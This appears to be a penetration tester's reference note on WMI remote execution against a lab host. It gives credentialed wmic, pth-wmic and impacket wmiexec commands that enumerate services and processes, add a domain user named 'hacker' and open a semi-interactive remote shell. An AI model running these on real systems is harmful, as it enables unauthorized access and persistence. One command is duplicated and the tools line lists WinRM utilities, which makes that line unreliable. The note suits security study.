Backlink: reference-notes-readme

WMI is Microsoft's consolidation of system management under a single umbrella. It is leveraged heavily under the hood for local operation, but can also be used for remote execution. Several built-in tools exist for either WQL query execution, or full code execution. Impacket includes wmiexec which also provides a semi-interactive shell. Remote WMI queries used RPC/DCOM as the communication bus.

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: winrm, winrs, PowerShell Remoting

Examples

List Services:

wmic.exe /USER:"testlab\josh" /PASSWORD:"Password1" /NODE:192.168.112.200 service get "startname,pathname"

Execute Code (Add User):

wmic /USER:"testlab\josh" /PASSWORD:"Password1" /NODE:192.168.112.200 process call create "net user hacker Str0nGP_$sw0rd /add /domain"

List Services (via PS cmdlet):

Get-WMIObject -ComputerName 192.168.112.200 -query "Select * from Win32_Service"Get-WMIObject -ComputerName 192.168.112.200 -query "Select * from Win32_Service"

List Processes (via Linux wmic util):

pth-wmic -U testlab/josh%Password1 //192.168.112.200 "select csname,name,processid,sessionid from win32_process"

Semi-interactive Shell (impacket):

wmiexec.py 'josh':'Password1'@192.168.112.200